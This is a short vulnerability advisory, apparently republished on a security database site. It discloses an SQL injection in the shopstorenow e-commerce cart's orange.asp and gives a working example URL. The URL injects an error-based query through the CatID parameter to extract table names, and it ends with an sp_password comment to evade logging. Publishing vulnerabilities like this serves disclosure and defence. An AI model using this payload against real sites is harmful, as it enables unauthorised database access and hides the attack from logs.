Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15618
HistoryJan 07, 2007 - 12:00 a.m.

shopstorenow (orange.asp) sql injection

2007-01-0700:00:00
vulners.com
15

============================= HItamputih Crew ====================
#hitamputih Advisory
##Discovered By : IbnuSina
#-----------------------------------------------------------
#Software: shopstorenow E-commerce Shopping Cart
#Method: SQL Injection

[[SQL]]]---------------------------------------------------------
http://[target]/[path]//orange.asp?CatID=[SQL]

ex:

http://[target]/[path]//orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))–sp_password

#########################################################################################